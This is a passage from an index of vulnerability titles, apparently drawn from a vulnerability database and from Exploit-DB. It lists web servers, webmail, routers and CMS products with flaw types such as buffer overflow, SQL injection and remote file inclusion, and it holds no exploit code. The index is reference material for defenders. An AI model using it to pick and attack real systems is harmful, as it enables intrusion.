browser high image count denial of service [7698] IBM WebSphere allows an attacker to view plaintext root password in &quot [7697] Citrix ICA Client allows a malicious Web site operator to download arbitrary files on the system to gain elevated privileges [7677] Allaire JRun could allow an attacker to access JSP files in the WEB-INF and META-INF directories [7674] Kebi Webmail administrative directory is accessible [7673] XFree86 buffer overflow using the Konqueror Web browser and file manager [7660] easyNews PHP script could reveal the path to Web root [7650] ValiCert EVA Admin user interface can allow injected script to be executed [7637] McAfee Webshield SMTP specially-malformed MIME encoded file attachments could bypass virus scanner [7623] Allaire JRun could allow remote attackers to view Web root directory [7600] Xitami Webserver stores admin password in plain text in &quot [7593] Netscape Web browser for Mac OS prints passwords in plain text [7585] IBM Informix SQL Web DataBlade module &quot [7582] Red Hat Stronghold Secure Web Server could allow an attacker to obtain sensitive server information [7565] WebBrowser ActiveX control in Internet Explorer allows Web site operator to view clipboard contents [7541] thttpd and mini_httpd Web server allows remote attacker to bypass permissions [7529] Website Pro args.bat and args.cmd files allows attackers to execute arbitrary commands [7525] ISA Web Proxy service failed [7524] ISA Web Proxy service stopped [7518] ISA Server packet filter did not detect an external interface [7516] ISA Server packet filter interface bind failure [7492] Ping to multicast address using loopback interface denial of service [7479] Wireless client successfully obtained Web access by HTTP [7458] Web Crossing WebX could allow session hijacking [7426] Microsoft Internet Explorer may expose authentication information to redirected Web sites [7419] Apache Web Server could allow remote attackers to overwrite .log files [7404] Linux WebTool inherited privileges [7399] RSA SecurID WebID debug mode allows attacker to gain information [7397] RSA SecurID WebID unicode directory traversal [7363] Apache Web Server hidden HTTP requests [7351] Webalizer allows an attacker to inject HTML tags into search keywords [7350] Webalizer allows an attacker to inject HTML tags into host names [7315] WebCart Webcart.cgi allows command execution [7310] Oracle9i Application Server administration interface port denial of service [7308] Oracle9i Application Server Web service long string denial of service [7307] Oracle9i Application Server Web services exits process unexpectedly [7306] Oracle9i Application Server Web services buffer overflow [7287] Novell GroupWise Web front-end directory traversal could allow arbitrary file retrieval [7279] Ipswitch IMail Web Calendaring buffer overflow [7273] Ipswitch IMail Web Messaging Service can be used to change other user`s information [7258] Microsoft Internet Explorer dotless IP could allow rendering of Web sites with incorrect Security Zone [7252] Third Voice Web annotation utility cross-site scripting [7216] Webmin brute force password attack [7205] Alexis Server Web access sends sensitive information in plain text [7189] Compaq Web-enabled Management Software buffer overflow [7174] Oracle Web server misconfiguration could allow an attacker to gain root privileges [7159] Xcache may return full path to requested pages on Web server [7157] Squid Web Proxy mkdir-only PUT request denial of service [7153] IBM WebSphere predictable sequence numbers could allow unauthorized access [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists [7103] Apple Mac OS X used with Apache Web server could disclose directory contents [7097] Wang/Kodak ActiveX controls can be used by a Web site operator to take action on a visiting user`s system [7033] Respondus for WebCT uses weak encryption [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default [7010] 4D Web Server directory traversal could allow a remote attacker to view files [6993] Webridge PX Application Suite server could reveal server information in error messages [6982] Microsoft IIS WebDAV long invalid request denial of service [6975] SIX-webboard &quot [6949] Linksys EtherFast routers could reveal passwords in HTML source of administrative interface [6873] BasiliX Webmail allows remote attackers to view arbitrary files [6790] ColdFusion Web publish example script can be used to upload and execute files [6788] Trend Micro InterScan WebManager HttpSave.dll buffer overflow [6786] Citrix NFuse Web root path disclosure [6771] vWebServer multiple long URL requests denial of service [6770] vWebServer MS-DOS device name denial of service [6769] vWebServer could reveal ASP source code [6759] Apple Mac OS Personal Web Sharing denial of service [6753] Gnatsweb help_file parameter could be used to execute commands with elevated privileges [6725] w3m Web browser malformed MIME header buffer overflow [6723] Tarantella server ttawebtop.cgi script could allow remote attackers to view arbitrary files [6697] HP VirtualVault with iPlanet Web Server allows data corruption [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure [6685] WebStore ws_mail.cgi command execution [6653] WebBoard &quot [6651] Microsoft ISA Server Web Proxy denial of service caused by embedded code in HTML email [6639] WebTrends Unicode space reveals script source code [6627] Webmin could allow attackers to gain sensitive information [6619] TWIG Webmail SQL query modification [6555] Microsoft Internet Explorer with certificate CRL checking enabled could allow Web site spoofing [6554] iPlanet Netscape Enterprise Web Publisher URI handling buffer overflow [6549] Microsoft IIS WebDAV lock method memory leak can cause a denial of service [6536] Apple Mac OS Personal Web Sharing denial of service [6527] Apache Web Server for Windows and OS2 denial of service [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6487] Linux SAP Web Application Server may allow execution of arbitrary code [6486] WebCalendar allows remote user to execute commands [6477] BRS WebWeaver FTP path disclosure [6476] BRS WebWeaver Web server &quot [6474] ICQ Web Front plugin denial of service [6468] NetCruiser Web Server could reveal directory path [6466] WebXQ &quot [6465] Cisco Aironet Web Configuration in use [6464] 3Com AirConnect System Setup Web Access [6463] 3Com AirConnect Special Functions Web Access [6462] 3Com AirConnect SNMP Setup Web Access [6461] 3Com AirConnect Security Setup Web Access [6460] 3Com AirConnect RF Setup Web Access [6459] 3Com AirConnect Modem Setup Web Access [6458] 3Com AirConnect Firmware Web Access [6457] 3Com AirConnect Filtering Setup Web Access [6456] 3Com AirConnect Easy Setup Web Access [6451] Perl Web Server directory traversal [6435] IBM WebSphere plug-in could allow attackers to view JSP source [6405] Microsoft Data Access Component Internet Publishing Provider allows WebDAV access [6400] GoAhead WebServer &quot [6389] Xitami Web server denial of service [6385] processit.pl CGI could allow attackers to view sensitive information about the Web server [6383] Microsoft ISA Server Web Proxy denial of service [6372] IBM WebSphere CGI macro denial of service [6371] Net.Commerce package in IBM WebSphere reveals installation path [6351] IBM Lotus Domino Web Server URL parsing denial of service [6350] IBM Lotus Domino Web Server CORBA denial of service [6349] IBM Lotus Domino Web Server Unicode denial of service [6348] IBM Lotus Domino Web Server DOS device denial of service [6347] IBM Lotus Domino Web Server HTTP header denial of service [6340] TalkBack CGI script could allow remote attackers to read files on the Web server [6315] BEA WebLogic may reveal JSP source code [6300] SurfControl SuperScout Web Filter bypass filtering rules [6295] WebSite Professional remote manager service denial of service [6283] BEA WebLogic Server could allow attackers to browse Web directories [6264] Compaq Web-enabled management software could allow users to bypass proxy settings [6240] MDaemon WorldClient Web services denial of service [6237] vBulletin PHP Web forum allows attackers to gain elevated privileges [6236] 3Com AirConnect Access Point Web server may reveal system security information [6214] WEBsweeper HTTP request denial of service [6205] Microsoft IIS WebDAV denial of service [6200] Cisco Aironet Web access allows remote attacker to view/modify configuration [6199] APC Web/SNMP Management Card Telnet denial of service [6187] Fastream FTP++ Client allows user to download files outside of Web root directory [6164] Orange Web Server &quot [6163] WebReflex Web server HTTP GET request denial of service [6132] Moby`s NetSuite Web server buffer overflow [6121] WEBactive HTTP Server directory traversal [6118] Resin Web server directory traversal [6114] Pi3Web reveals physical path of server [6113] Pi3Web ISAPI tstisapi.dll denial of service [6110] HP VirtualVault iPlanet Web Server denial of service [6102] WebPALS Library System CGI script could allow attackers to view unauthorized files or execute commands [6101] WebSPIRS CGI could allow an attacker to view unauthorized files [6100] WebPage.cgi allows attackers to view sensitive information [6085] Microsoft Internet Explorer scriptlet rendering could allow Web site operators to read files [6068] BiblioWeb Server GET request denial of service [6066] BiblioWeb Server directory traversal [6064] Free Java Web Server directory traversal [6061] HSWeb Web Server allows attacker to browse directories [6058] Netcape Web Publisher poor ACL permissions [6046] GoAhead WebServer directory traversal [6031] Cisco CCS command line interface could allow read access to files and directories [6030] Cisco CCS command line interface denial of service [6011] Webmin use of tmpfiles could allow a local user to overwrite files [6008] Allaire JRun allows file access using malformed WEB-INF directory request [5982] LocalWEB2000 directory traversal [5935] Compaq Web-Based Management buffer overflow [5934] Basilix Webmail System allows unauthorized users to retrieve files [5930] 24Link Web Server bypasses authentication [5920] Web Extender Client (WEC) NTLM authentication [5908] NetScreen Firewall WebUI buffer overflow [5900] IBM WebSphere denial of service [5833] IBM Informix Webdriver remote Admin access [5827] IBM Informix Webdriver symbolic link [5823] Microsoft IIS Web form submission denial of service [5794] Poll It Web root directory is easily accessible [5783] QNX Voyager Web server directory traversal could allow attackers to view files [5782] BEA WebLogic Server dot dot URL buffer overflow [5659] Apache Web server discloses files when used with php script [5626] Cisco CBOS Web access enabled denial of service [5625] phpWebLog allows users to bypass authentication [5612] PostACI Webmail could reveal usernames and passwords [5588] BEA WebLogic Server and Express could allow users to bypass authentication [5572] McAfee WebShield outgoing SMTP recipient denial of service [5571] McAfee WebShield SMTP filter bypass [5554] WatchGuard SOHO Web config server could allow unauthenticated access [5521] RobinHood HTTP Web server buffer overflow denial of service [5482] Compaq Web-Based Management stores passwords in plaintext [5446] iPlanet Web Server server side HTML parsing buffer overflow [5407] Allaire JRun Server could allow unauthorized access to WEB-INF directory [5396] Web servers allows attacker to remotely retrieve session ID cookies [5383] Java Web Server &quot [5366] BOA Webserver configuration file CGI execute [5351] Web Shopper shopper.cgi allows remote file retrieval [5347] eXtropia WebStore CGI allows remote file retrieval [5332] ICQ Web Front URL passing could be used to create a denial of service [5330] BOA Web Server directory traversal [5326] Pegasus Mail allows Web sites to retrieve files from visiting user`s systems [5325] WebData allows importing of any file [5297] Web+ example script allows attacker to execute commands or read files [5290] Web+ reveals source code of WML files [5289] Web+ exposes internal IP address [5288] Web+ reveals physical path [5252] IBM WebSphere Application Server Host: header denial of service [5243] WebTV hijack code could forward stored mail [5234] WebClerk long username and password denial of service [5233] LocalWeb long filename denial of service [5231] MetaWeb Server with MetaIP and Sendmail could allow a remote dot attack [5216] WebTV UDP packet will cause a denial of service [5214] IBM AIX allows unauthorized user to clear interface statistics [5204] Apache WebDAV directory listings [5197] Apache Web server reveals CGI script source code [5157] WebSite Pro allows any user to upload files [5135] Sun Java Web Server WebAdmin arbitrary code execution [5127] Microsoft Virtual Machine java applet allows malicious Web site to masquerade as visitor [5111] HP OpenView Network Node Manager Web password [5107] IE 5.x and Outlook allows malicious Web site to view files [5100] WebShield SMTP domain name period denial of service [5096] BEA WebLogic redirect request plug-in buffer overflow can be used to gain root [5069] Sun Solaris AnswerBook2 administration interface [5027] BEA Systems WebLogic Java injection [5024] BEA WebLogic FileServlet show code [5012] IBM Websphere could allow an attacker to view source code [4964] BAIR Web filtering software security bypass [4955] Java Web server ACLs revealed [4952] LISTSERV Web archive remote buffer overflow [4949] WEBactive long GET request denial of service [4936] Alibaba Web server CGI scripts allow user to view directory listing [4935] Alibaba Web server exe script vulnerability allows user to overwrite files [4934] Alibaba Web server long GET denial of service [4925] CVSWeb CGI allows commiters to gain shell access [4901] Savant Web server buffer overflow [4896] LocalWEB HTTP Server GET buffer overflow [4895] Webmin SSL requests denial of service [4874] Oracle Web Listener for AIX denial of service [4836] Sawmill exposes first line of files on the Web server [4792] WebSTAR Server Suite long GET request buffer overflow [4776] HP Web JetAdmin networked peripherals denial of service [4775] BEA WebLogic allows users to read source of files [4771] DMailWeb can authenticate to untrusted POP servers [4770] DMailWeb login could allow unauthorized access [4759] NetWin DMailWeb long pohost denial of service [4758] NetWin DMailWeb long username denial of service [4742] WebBBS large GET request can overflow buffer and allow users to execute code [4697] IBM Websphere allows users to read source of jsp files [4696] Extropia WebBanner input validation allows user to execute arbitrary files [4694] BEA WebLogic allows users to read source of JSP files [4652] Network Associates WebShield SMTP allows remote users to set configuration options [4651] Network Associates WebShield SMTP allows remote users to retrieve the service`s configuration [4621] Form and URL tampering possible in several Web-based shopping cart applications [4616] Savant Web server allows remote user to read source code of CGI files [4611] ColdFusion Web Application Server denial of service [4586] Concatus iMate Web Mail Server 2.5 denial of service [4574] ICQ Web Front guestbook overflow denial of service [4566] BEA WebLogic Commerce Server two-way authentication disabled [4550] Netscape Navigator could allow an attacker to masquerade as a legitimate Web site [4542] Carello Web shopping cart add.exe allows remote file creation and duplication [4540] Network Associates WebShield SMTP buffer overflow could allow remote code execution [4506] IBM Lotus Domino Server file modification through a Web browser [4505] IBM Lotus Domino Web applications may allow unauthorized access [4463] Banner Rotating 01 Web site banner script adminsitrator password accessible [4447] Microsoft Internet Explorer bug allows Web page operator to view cookie [4445] Microsoft Office UA Control malicious Web operator [4437] BEA WebLogic Server is running with the demo certificate [4420] DMailWeb QUERY_STRING buffer overflow [4419] L-Soft`s LISTSERV Web Archive component contains a remotely executable buffer overflow [4408] UltraBoard allows attackers to access files on the Web server [4318] InetServ 3.0 Webmail GET buffer overflow [4293] iPlanet Web Server 4.1 GET denial of service [4282] TalentSoft Web+ directory transversal allows attackers to read files [4252] HTTP PUT method allows clients to upload files to a Web server [4231] WebObjects large header denial of service [4227] Microsoft Index Server webhits.dll reveals source of ASP files [4215] Web servers may include malicious HTML tags [4202] Netscape Enterprise Server WebPublisher allows unauthorized access [4198] Oracle Web Listener allows remote attackers to execute arbitrary commands [4120] MERCUR WebView WebMail-Client 1.0 [4116] Netscape Enterprise Server and iPlanet Web Server directory indexing [4042] Trend Micro OfficeScan duplicate Web server can modify client configuration [4009] SurfControl SuperScout Web Filter allows users to view unauthorized Web pages [3923] Novell GroupWise Web server file read [3833] Zeus Web Server weak password encryption [3830] WebRamp has default password [3725] HP Secure Web Console weak password encryption [3666] Microsoft Internet Explorer Web Proxy Auto-Discovery could allow clients to accept untrusted proxy setting information [3554] MDaemon WebConfig HTTP server can be remotely crashed by long requests [3380] Zeus Web server remote root compromise [3367] WebTrends Report Server default installation has blank administrator password [3364] WebTrends Enterprise Reporting Server debug file allows world to access usernames and passwords [2925] Network interface is in promiscuous mode [2675] Microsoft IIS 4.0 samples installation on Web server [2674] Browsing enabled for Web directory [2673] Microsoft IIS samples installation on Web server [2348] HotSpot VM equipped Web servers can be remotely crashed [2311] WebTrends bad permissions on stored passwords [2287] Novell Web servers can be remotely crashed or hung [2280] WebSuite server remote denial of service [2273] Netscape Web browsers allow access to sensitive information via the view-source: protocol [2253] Aleph ExLibris Web server allows remote retrieval of system files [2207] ColdFusion Web administration feature can be used to stop the CF server [2205] Netscape Web browsers exploited for information by embedding scripts into TITLE [2196] Counter.exe Web hit counter is vulnerable to a denial of service attack [2192] Netscape Web browsers can be tricked into executing JavaScript via the bookmarks file [2175] Alibaba Web server allows browsing the file system outside the server root directory [2173] Microsoft Internet Explorer FSO could allow remote file manipulation from a Web server [2085] ICQ personal Web server allows remote access to entire file system [2072] WebCom`s Guestbook CGI allows remote file reading [2051] WebRamp routers can have their IP address changed from remote [2050] WebRamp routers can be crashed from remote [2039] HTML IMG tag width can be used to crash various Web browsers [1914] HyperSeek CGI allows anyone to change Web content [1898] IMail`s Web service can be overflowed with a long URL [1831] Cobalt RaQ Web server could reveal user`s command history [1812] Oracle Web Server 2.1 can be remotely crashed [1810] Netscape Enterprise Server can be tricked into listing Web directories [1795] SNMP agents reveal information about network interfaces [1778] ICQ99 can be crashed through the built-in personal Web server [1775] NFR webd contains a remotely exploitable buffer overflow [1670] WebRamp M3 fails to restrict which remote hosts can open Telnet sessions [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service [1611] BackWeb Polite Agent Protocol Infopak spoofing [1610] Apple Mac OS Web Sharing denial of service [1598] Web browser frame spoof [1585] Shockwave allows access to internal Web sites [1583] Cisco PIX remote file exposure through included Web server [1577] Cisco WCCP allows redirection of Web traffic [1565] BackWeb stores proxy information in plaintext [1533] Robots.txt file controls Web spiders [1467] WEBgais CGI script allows remote command execution [1465] Web finger access attempt [1438] SNMP kill interface [1418] Excite for Web Servers could allow remote command execution [1410] Analog forms interface allows remote file retrieval [1405] Netscape allows Web pages to browse directories and read files on system [1384] Xitami Web servers allows remote execution of arbitrary files [1377] Cold Fusion 3.x allows Web users to upload files to the system [1368] Microsoft IIS 4.0 allows file execution in the Web site directory [1366] Kolban Webcam32 can be remotely crashed or potentially used to execute arbitrary code [1269] Microsoft IIS incorrect Web permissions [952] Restricted Web directory with no security [951] Wscript present on Web server [950] Writable Web directory [948] Microsoft IIS samples installed on Web server [943] Microsoft Office installed on Web server [942] Web directory with no security [934] Executable Web directory [932] Developer tools on Web server [931] Cscript present on Web server [930] Web directories with crossing paths [928] Web directory browsing enabled [926] Web password change using insecure connection [925] 8.3 file names on Web server could allow an attacker to bypass security restrictions [804] PPP interfaces [709] Win32 Web servers allow access to files requested using the 8.3 format [683] Cookies passed to Web browser [524] DAT files in Temporary Internet Files directory store Web browser activity [490] Malicious Java applets can be found on the Web [488] ifconfig allows users to configure network interface parameters [461] Netscape and Internet Explorer Web browsers allow attackers to acquire user ID and password [414] HP-UX nettune utility allows non-privileged users to configure interfaces [339] Novell Convert.bas Web server script [333] SGI Webdist CGI script allows remote command execution [297] Glimpse Web server allows remote command execution [296] WebGais websendmail allows remote command execution [295] WebSite 1.1 for Windows NT winsample buffer overflow [294] WebSite 1.1 uploader [146] Shell interpreters can be used to execute commands on Web servers [90] Web server directories without an index file [63] Win32 Web servers remote command execution through .CMD and .BAT files Exploit-DB - https://www.exploit-db.com: [31133] F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability [30665] Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability [30587] Axis Communications 207W Network Camera Web Interface admin/restartMessage.shtml server Parameter CSRF [30586] Axis Communications 207W Network Camera Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter CSRF [30585] Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF [30167] Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability [29277] winamp web interface 7.5.13 Multiple Vulnerabilities [28062] Cisco CallManager 3.x/4.x Web Interface ccmuser/logon.asp XSS [28061] Cisco CallManager 3.x/4.x Web Interface ccmadmin/phonelist.asp pattern Parameter XSS [26771] Nortel SSL VPN 4.2.1 .6 Web Interface Input Validation Vulnerability [25331] SonicWALL SOHO 5.1.7 Web Interface Multiple Remote Input Validation Vulnerabilities [24792] IPCop 1.4.1 Web Administration Interface Proxy Log HTML Injection Vulnerability [24621] Pinnacle ShowCenter 1.51 Web Interface Skin Denial of Service Vulnerability [24245] Netegrity IdentityMinder Web Edition 5.6 Management Interface XSS [24235] ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass Vulnerability [23687] Macallan Mail Solution Macallan Mail Solution 2.8.4 .6 (Build 260) - Web Interface Authentication Bypass Vulnerability [23559] WebTrends Reporting Center 6.1 Management Interface Path Disclosure Vulnerability [23410] IBM Directory Server 4.1 Web Administration Interface Cross-Site Scripting Vulnerability [23320] Mldonkey 2.5 -4 Web Interface Error Message Cross-site Scripting Vulnerability [23135] FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness [22859] Axis Print Server 6.15/6.20 Web Interface Denial of Service Vulnerability [22692] Zeus Web Server 4.x Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability [22639] IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability [22407] Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial of Service Vulnerability [22244] Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability [22000] Zeus Web Server 4.0/4.1 Admin Interface Cross Site Scripting Vulnerability [21827] HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability [18343] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure [17377] Polycom IP Phone Web Interface Data Diclosure Vulnerability [17376] Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability [17215] Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities [15611] JDownloader Webinterface Source Code Disclosure Vulnerability [14236] Sun Java Web Server 7.0 u7 Admin Interface DoS [2895] J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit [31147] Adult Webmaster PHP - Password Disclosure [31110] Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion [31109] Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion [31108] Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion [31107] Portail Web Php 2.5.1 config/conf-activation.php site_path Parameter Remote File Inclusion [31095] Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross Site Scripting Vulnerabilities [31079] webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability [31064] WebCalendar 1.1.6 search.php adv Parameter XSS [31063] WebCalendar 1.1.6 pref.php Query String XSS [31055] Multiple Web Wiz Products Remote Information Disclosure Vulnerability [31045] Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability [31021] Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability [30938] Web Sihirbazi 5.1.1 'default.asp' Multiple SQL Injection Vulnerabilities [30897] iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability [30890] Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities [30877] Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability [30858] webSPELL 4.1.2 calendar.php Multiple Parameter XSS [30857] webSPELL 4.1.2 usergallery.php galleryID Parameter XSS [30856] Easy File Sharing Web Server 1.3x Directory Traversal and Multiple Information Disclosure Vulnerabilities [30855] WebDoc 3.0 Multiple SQL Injection Vulnerabilities [30810] Proverbs Web Calendar 1.1 Password Parameter SQL Injection Vulnerability [30770] AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities [30768] IBM WebSphere Application Server 5.1.1 WebContainer HTTP Request Header Security Weakness [30761] WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities [30759] VTLS Web Gateway 48.1 Searchtype Parameter Cross-Site Scripting Vulnerability [30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability [30746] Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability [30745] Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability [30730] SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion [30708] Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability [30706] CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability [30651] Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 Remote File Include Vulnerability [30649] NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities [30642] AfterLogic MailBee WebMail Pro 3.x default.asp mode2 Parameter XSS [30641] AfterLogic MailBee WebMail Pro 3.x login.php mode Parameter XSS [30628] FSD 2.052/3.000 servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow [30600] Xunlei Web Thunder 5.6.9.344 ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability [30599] WebBatch webbatch.exe dumpinputdata Variable Remote Information Disclosure [30598] WebBatch webbatch.exe URL XSS [30560] 212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability [30518] Ripe Website Manager 0.8.x pages/delete_page.php id Parameter SQL Injection [30501] Systeme de vote pour site Web 1.0 Multiple Remote File Include Vulnerabilities [30483] Web News 1.1 news.php config[root_ordner] Parameter Remote File Inclusion [30482] Web News 1.1 feed.php config[root_ordner] Parameter Remote File Inclusion [30481] Web News 1.1 index.php config[root_ordner] Parameter Remote File Inclusion [30442] WebDirector Index.PHP Cross Site Scripting Vulnerability [30440] WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting Vulnerability [30432] Novell GroupWise 6.5 WebAccess User.Id Parameter Cross Site Scripting Vulnerability [30428] Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability [30427] Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability [30379] Webbler CMS 3.1.3 Mail A Friend Open Email Relay Vulnerability [30378] Webbler CMS 3.1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities [30375] FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities [30373] Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI) [30312] Citadel WebCit 7.02/7.10 showuser who Parameter XSS [30310] Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities [30299] ActiveWeb Contentserver 5.6.2929 CMS Client Side Filtering Bypass Vulnerability [30296] ActiveWeb Contentserver 5.6.2929 Picture_Real_Edit.ASP SQL Injection Vulnerability [30278] SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities [30256] Oracle Rapid Install Web Server Secondary Login Page Cross Site Scripting Vulnerability [30246] WHMCS 4.x & 5.x - Multiple Web Vulnerabilities [30233] LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability [30231] Key Focus Web Server 3.1 Index.WKF Cross-Site Scripting Vulnerability [30228] Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability [30209] HP LoadRunner EmulationAdmin - Web Service Directory Traversal [30199] WebIf OutConfig Parameter Local File Include Vulnerability [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability [30187] Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability [30163] Blue Coat Systems K9 Web Protection 32.36 Remote Buffer Overflow Vulnerability [30146] Print n Share v5.5 iOS - Multiple Web Vulnerabilities [30143] WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability [30100] British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities [30067] rdiffweb 0.3.5 - Directory Traversal vulnerability [30055] Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities [30038] Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access [30031] Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities [30027] CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability [30000] Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities [29961] TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS [29960] TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection [29957] ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS [29956] ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS [29943] Progress WebSpeed 3.0/3.1 - Denial of Service Vulnerability [29908] TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Include Vulnerabilities [29906] CafeLog B2 0.6.1 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion [29905] CafeLog B2 0.6.1 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion [29904] CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion [29897] Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability [29877] Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection [29862] Web Service Deluxe News Manager 1.0.1 Deluxe Footer.PHP Local File Include Vulnerability [29851] MailBee WebMail Pro 3.4 Check_login.ASP Cross-Site Scripting Vulnerability [29847] phpwebnews 0.1 bukutamu.php m_txt Parameter XSS [29846] phpwebnews 0.1 index.php m_txt Parameter XSS [29845] phpwebnews 0.1 iklan.php m_txt Parameter XSS [29843] webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability [29762] Web Wiz Forums 8.05 String Filtering SQL Injection Vulnerability [29744] Viper Web Portal 0.1 Index.PHP Remote File Include Vulnerability [29742] Horde IMP Webmail <= 4.0.4 Client Multiple Input Validation Vulnerabilities [29696] aWebNews 1.1 listing.php path_to_news Parameter Remote File Inclusion [29688] EmbeddedWB Web Browser ActiveX Control - Remote Code Execution Vulnerability [29612] WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability [29610] Ezboo Webstats 3.03 Administrative Authentication Bypass Vulnerability [29602] WebTester 5.0.20060927 directions.php typeID Parameter SQL Injection [29575] Plain Old Webserver 0.0.7/0.0.8 Firefox Extension Directory Traversal Vulnerability [29544] Juniper Junos J-Web - Privilege Escalation Vulnerability [29534] SpoonLabs Vivvo Article Management CMS 3.40 Show_Webfeed.PHP SQL Injection Vulnerability [29519] Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability [29476] Microweber 0.905 - Error Based SQL Injection [29461] Apple WebKit build 18794 WebCore Remote Denial of Service Vulnerability [29439] iPlanet Web Server 4.1 Search Module Cross-Site Scripting Vulnerability [29434] Magic Photo Storage Website user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion [29433] Magic Photo Storage Website user/user_extend.php _config[site_path] Parameter Remote File Inclusion [29432] Magic Photo Storage Website user/user_email.php _config[site_path] Parameter Remote File Inclusion [29431] Magic Photo Storage Website user/user_catelog_password.php _config[site_path] Parameter Remote File Inclusion [29430] Magic Photo Storage Website user/upload_photo.php _config[site_path] Parameter Remote File Inclusion [29429] Magic Photo Storage Website user/register.php _config[site_path] Parameter Remote File Inclusion [29428] Magic Photo Storage Website user/logout.php _config[site_path] Parameter Remote File Inclusion [29427] Magic Photo Storage Website user/login.php _config[site_path] Parameter Remote File Inclusion [29426] Magic Photo Storage Website user/index.php _config[site_path] Parameter Remote File Inclusion [29425] Magic Photo Storage Website user/delete_category.php _config[site_path] Parameter Remote File Inclusion [29424] Magic Photo Storage Website user/couple_profile.php _config[site_path] Parameter Remote File Inclusion [29423] Magic Photo Storage Website user/couple_milestone.php _config[site_path] Parameter Remote File Inclusion [29422] Magic Photo Storage Website user/change_catalog_template.php _config[site_path] Parameter Remote File Inclusion [29421] Magic Photo Storage Website user/add_news.php _config[site_path] Parameter Remote File Inclusion [29420] Magic Photo Storage Website user/add_category.php _config[site_path] Parameter Remote File Inclusion [29419] Magic Photo Storage Website include/db_config.php _config[site_path] Parameter Remote File Inclusion [29418] Magic Photo Storage Website include/config.php _config[site_path] Parameter Remote File Inclusion [29417] Magic Photo Storage Website admin/send_email.php _config[site_path] Parameter Remote File Inclusion [29416] Magic Photo Storage Website admin/membership_pricing.php 